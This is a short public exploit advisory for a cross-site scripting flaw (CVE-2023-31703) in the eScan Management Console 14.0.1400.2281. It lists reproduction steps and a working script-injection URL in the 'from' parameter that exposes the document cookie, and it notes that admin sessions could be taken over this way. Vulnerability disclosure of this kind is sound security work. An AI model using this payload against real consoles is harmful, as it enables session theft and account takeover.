Headline
eScan Management Console 14.0.1400.2281 Cross Site Scripting
eScan Management Console version 14.0.1400.2281 suffers from a cross site scripting vulnerability.
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting# Date: 2023-05-16# Exploit Author: Sahil Ojha# Vendor Homepage: https://www.escanav.com# Software Link: https://cl.escanav.com/ewconsole.dll# Version: 14.0.1400.2281# Tested on: Windows# CVE : CVE-2023-31703*Step of Reproduction/ Proof of Concept(POC)*1. Login into the eScan Management Console with a valid user credential.2. Navigate to URL:https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=3. Now, Inject the Cross Site Scripting Payload in "from" parameter asshown below and a valid XSS pop up appeared.https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=4. By exploiting this vulnerability, any arbitrary attacker could havestolen an admin user session cookie to perform account takeover.Related news
CVE-2023-31703: CVE-2023-31703/README.md at main · sahiloj/CVE-2023-31703
Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter.